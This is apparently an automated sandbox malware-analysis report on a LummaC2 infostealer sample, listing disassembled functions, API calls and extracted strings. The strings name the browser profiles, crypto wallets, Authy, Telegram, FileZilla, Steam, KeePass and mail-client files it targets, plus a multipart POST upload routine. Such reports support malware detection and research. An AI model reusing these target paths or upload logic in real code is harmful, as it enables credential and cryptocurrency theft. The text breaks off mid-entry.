%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles, xrefs: 0042D7F0
Brave Software, xrefs: 0042ECAD
Wallets/Atomic, xrefs: 0042ECE4
%localappdata%\Chro576xedmium\Use576xedr Data, xrefs: 0042E76E
y_B>, xrefs: 0042E011
Wallets/Authy Desktop, xrefs: 0042ED17
%appdata%\FileZilla, xrefs: 0042DC54, 0042DC59, 0042DC6C
Wal576xedlets/Bin576xedance, xrefs: 0042EE5B
%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble, xrefs: 0042EBB0
Applications/Steam, xrefs: 0042DC94

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
API String ID: 0-2545520832
Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F

Function 00436ADC Relevance: 93.0, APIs: 22, Strings: 30, Instructions: 2004COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043700A
KiUserCallbackDispatcher.NTDLL(00000000), ref: 0043726A
_strlen.LIBCMT ref: 004377D2
_strlen.LIBCMT ref: 0043788B
_strlen.LIBCMT ref: 00438B52
EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 00438BA3
_strlen.LIBCMT ref: 00438BAC
_strlen.LIBCMT ref: 00438C5F
_strlen.LIBCMT ref: 00438CD1

Strings

q7 C, xrefs: 004371EB
- Screen Resoluton: , xrefs: 0043887A
y_B>, xrefs: 00438149
- Phys576xedical Ins576xedtalled Memor576xedy: , xrefs: 004373D9
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 00436B81, 0043729C, 00437307, 00437D37
4jn`, xrefs: 00437077
o._, xrefs: 00436C86
$jRk, xrefs: 004370BA
Ver, xrefs: 00438630
TT4, xrefs: 00437101
user32.dll, xrefs: 00436F71, 004388BF
x_B>, xrefs: 00436BB7
GhYuIq, xrefs: 00438C49
o._, xrefs: 00437C1B
sion, xrefs: 00438638
Aan(, xrefs: 004377FD
Syste576xedm.txt, xrefs: 004381E6
4jn`, xrefs: 00436D91
LID(Lu576xedmma ID): , xrefs: 00438263
- HW576xedID: , xrefs: 0043841F
kernel32.dll, xrefs: 00437F81, 004386D8, 00438A67
y_B>, xrefs: 00436BC2
n: , xrefs: 00438640
- CP576xedU Name: , xrefs: 00436FE0
advapi32.dll, xrefs: 00438CB3
p7 C, xrefs: 004371E0
n._, xrefs: 00436FA9
Lum576xedmaC2, Build 20233101, xrefs: 0043824A
%s (%d.%d.%d), xrefs: 00438606
C: , xrefs: 00437F16

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
API String ID: 3760342818-3445073979
Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B

Function 0040B81C Relevance: 70.2, APIs: 17, Strings: 22, Instructions: 1922stringCOMMON

Download Yara Rule

APIs

lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
lstrcatW.KERNEL32(?,?), ref: 0040C427
lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
lstrlenW.KERNEL32(?), ref: 0040C581
lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
lstrlenW.KERNEL32(00001A2F), ref: 0040C901
lstrlenW.KERNEL32(00001A2F), ref: 0040D826

Strings

LOCK, xrefs: 0040D3C0
K2&e, xrefs: 0040C262
L2&e, xrefs: 0040CFFB
\??\, xrefs: 0040CC06
Y=`, xrefs: 0040D07D
"B!H, xrefs: 0040CD2B
Ku^%, xrefs: 0040D785
ntdll.dll, xrefs: 0040CCDE, 0040D538, 0040D59F
{#9, xrefs: 0040B98F
Y[[T, xrefs: 0040BA47
L2&e, xrefs: 0040CA7D
{#9, xrefs: 0040C68A
kernel32.dll, xrefs: 0040BA2D
Y=`, xrefs: 0040BF65
"B!H, xrefs: 0040C01E
Ku^%, xrefs: 0040D2EB
Ku^%, xrefs: 0040D1F5
Ku^%, xrefs: 0040BE93
Ku^%, xrefs: 0040D407
Ku^%, xrefs: 0040BD4A
Ku^%, xrefs: 0040C4E3
bi, xrefs: 0040BCD9

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcmp
String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
API String ID: 156957741-3266097529
Opcode ID: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
Opcode Fuzzy Hash: 586842b40f5e22ce16161be6ee07f9eaddf4cb437a7acc71fa442095b329c1f4
Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F

Function 00430E6C Relevance: 41.7, APIs: 14, Strings: 9, Instructions: 1432memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
GetProcessHeap.KERNEL32 ref: 004314B2
HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
ReleaseDC.USER32(00000000,?), ref: 00432204
GetProcessHeap.KERNEL32 ref: 004326F0
RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
GetProcessHeap.KERNEL32 ref: 00432701
HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708

Strings

y_B>, xrefs: 004314CE
TT4, xrefs: 00431425
y_B>, xrefs: 0043222D
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 004318AA, 00431A4B
q7 C, xrefs: 004317E9
q7 C, xrefs: 00430F99
?, xrefs: 004325D3
TT4, xrefs: 00432147
$jRk, xrefs: 004313CB

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocAllocateBitsRelease
String ID: $jRk$?$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$q7 C$q7 C$y_B>$y_B>
API String ID: 2023195035-2009061895
Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B

Function 00434080 Relevance: 41.1, APIs: 10, Strings: 13, Instructions: 872registryCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004346DB
RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
RegCloseKey.KERNELBASE(?), ref: 0043475B
RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76

Strings

TT4, xrefs: 00434543
y_B>, xrefs: 0043463A
TT4, xrefs: 00434C71
$jRk, xrefs: 00434578
Software.txt, xrefs: 00434E05
DisplayName, xrefs: 00434BF4
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0043495F, 00434CEC
$jRk, xrefs: 00434B06
%s%s, xrefs: 004346D5
TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK, xrefs: 0043420B, 004343FA, 004347A0, 004348F2, 00434D49, 00434D73
?, xrefs: 00434915
%s\%s, xrefs: 00434CF1
y_B>, xrefs: 00434738

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: Close$EnumOpenwsprintf
String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TBJZidQZ06sb5pW3YfJPrWEyf4gjh9c0mU/IqqyLBZjR26pm9LoFs/Dyzd+rN/4r78bPv7mZtOP81UqVgqjTOJZDXK0g1t/2zYyr8+JKnBcgAt63LmhmeMOA3+6c0pmyiMftbbAPwnaC16dRcUmWxu2c9ZEGgSfrzprF/DrDBM/tMndPpg1vtXSeHAptAS42vkak4Eb4Oo3EyJbARoKJTh9mZci6yA9XiU+HttmhDTBEecmsGjOwbrXx+yHLf7Qa1lyK$TT4$TT4$y_B>$y_B>
API String ID: 44529101-2968445494
Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B

Function 0041F9A4 Relevance: 40.6, APIs: 6, Strings: 16, Instructions: 2064COMMON

Download Yara Rule

Strings

EeS, xrefs: 00420E73
EeS, xrefs: 0041FF95
VL6T, xrefs: 004215D1
_m.Q, xrefs: 00421C7C
eo>w, xrefs: 0041FE06
mNA/, xrefs: 0041FA0C
KI3i, xrefs: 004209BF
"w, xrefs: 004201BD
"w, xrefs: 0041FD1F
fo>w, xrefs: 0042133B
VL6T, xrefs: 0041FFA0
fo>w, xrefs: 0042079B
JI3i, xrefs: 004200BA
EeS, xrefs: 00420D0C
KI3i, xrefs: 00421D30
_m.Q, xrefs: 0042046C

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
API String ID: 0-3469262258
Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F

Function 0040E14E Relevance: 40.3, APIs: 6, Strings: 16, Instructions: 1822stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3

Strings

n_v, xrefs: 0040F040
Pz#, xrefs: 0040E59F
"t8, xrefs: 0040F623
)lu, xrefs: 0040F035
)lu, xrefs: 0040EEC0
v2B, xrefs: 0040F158
Ied|, xrefs: 0040F83D
(lu, xrefs: 0040E72D
kernel32.dll, xrefs: 0040E764
u2B, xrefs: 0040E89E
Ied|, xrefs: 0040E74E
"t8, xrefs: 0040E6AF
Pz#, xrefs: 0040F5D4
!t8, xrefs: 0040E6A4
n_v, xrefs: 0040FE12
v2B, xrefs: 0040E894

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
API String ID: 4038537762-116603239
Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B

Function 0042AD82 Relevance: 25.7, Strings: 20, Instructions: 749COMMON

Download Yara Rule

Strings

Mail Clients\The Bat\AppData, xrefs: 0042B0AB, 0042B0B0, 0042B0C3, 0042B0D6, 0042B0E9, 0042B0FC, 0042B10F, 0042B199, 0042B19E, 0042B1B1, 0042B56B, 0042B570, 0042B583, 0042B596
%appdata%\The Bat!, xrefs: 0042B265
*.MSB, xrefs: 0042B0C4, 0042B7A3
%localappdata%\The Bat!, xrefs: 0042B935
*.txt, xrefs: 0042B1B2, 0042B61E
*.HBI, xrefs: 0042B19F, 0042B90E
)lu, xrefs: 0042B239
*.EML, xrefs: 0042B0B1, 0042B790
kernel32.dll, xrefs: 0042B5B3, 0042B8E5
n_v, xrefs: 0042AFFA
*.mbox, xrefs: 0042B046, 0042B0D7
*.TBK, xrefs: 0042B110, 0042B8B9
(lu, xrefs: 0042AF6C
n_v, xrefs: 0042B244
*.TBN, xrefs: 0042B531, 0042B584
*.MSG, xrefs: 0042B597, 0042B77D
*.FLX, xrefs: 0042B06C, 0042B0FD
Mail Clients\The Bat\Local, xrefs: 0042B040, 0042B045, 0042B058, 0042B06B, 0042B518, 0042B51D, 0042B530, 0042B619, 0042B777, 0042B77C, 0042B78F, 0042B7A2, 0042B8B4, 0042B909
*.TBB, xrefs: 0042B51E, 0042B571
*.ABD, xrefs: 0042B059, 0042B0EA

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
API String ID: 4038537762-373908387
Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

Function 00405AAA Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 448
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E

Strings

\Loc576xedal Extens576xedion Settin576xedgs\, xrefs: 00405EC6
n_v, xrefs: 00405B64
,, xrefs: 00405C1E
*576xed, xrefs: 004061E5
/Ext576xedensio576xedns/, xrefs: 00405EF5
n_v, xrefs: 00405C99

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
API String ID: 4038537762-1578839816
Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B

Function 0041C270 Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 812COMMON

Download Yara Rule

Strings

TeslaBrowser/5.5, xrefs: 0041C870
Content-Type: multipart/form-data; boundary=%s, xrefs: 0041CCD2
POST, xrefs: 0041C824
M%, xrefs: 0041C3CB
winhttp.dll, xrefs: 0041C43E, 0041C859, 0041C85E, 0041C880, 0041C8A2, 0041CA62, 0041CACA, 0041CC64, 0041CD5B, 0041CDBE, 0041CF1A, 0041CFAF
L%, xrefs: 0041C3AA
9a%^, xrefs: 0041C981
SqDe87817huf871793q74, xrefs: 0041CCCD
9a%^, xrefs: 0041C480
9a%^, xrefs: 0041CF0D
M%, xrefs: 0041C500
9a%^, xrefs: 0041C5DF

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
API String ID: 0-485045143
Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

Function 0040620B Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 445
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
lstrcatW.KERNEL32(?,?), ref: 00406423
lstrcatW.KERNEL32(?,?), ref: 0040692A
lstrcatW.KERNEL32(?,0045E102), ref: 00406934

Strings

Ku^%, xrefs: 004065EC
Y=`, xrefs: 00406310
Y=`, xrefs: 004065CA
Ku^%, xrefs: 004068CD

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID: lstrcat
String ID: Ku^%$Ku^%$Y=`$Y=`
API String ID: 4038537762-3617128223
Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

Function 0042B9C5 Relevance: 16.7, Strings: 13, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*CACHE.PM, xrefs: 0042BE31
Mail Clients\Pegasus, xrefs: 0042BA75, 0042BA7A, 0042BA8D, 0042BAA0, 0042BAB3, 0042BE2B, 0042BE30, 0042BE43, 0042BE56, 0042BE69
*.WPM, xrefs: 0042BE44
kernel32.dll, xrefs: 0042BA16
*.CNM, xrefs: 0042BA7B
*.PM, xrefs: 0042BE57
*.PMN, xrefs: 0042BAA1
Ku^%, xrefs: 0042BCB6
*.PML, xrefs: 0042BAB4
*.PMF, xrefs: 0042BA8E
*.USR, xrefs: 0042BE6A
Ku^%, xrefs: 0042BE15
C:\PMAIL, xrefs: 0042BB07

Memory Dump Source

Source File: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_OlZzqwjrwO.jbxd

Yara matches

Similarity

API ID:
String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
API String ID: 0-3904125897
Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

Function 0040A928 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 475
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,76F90880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,76F90880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2

Strings

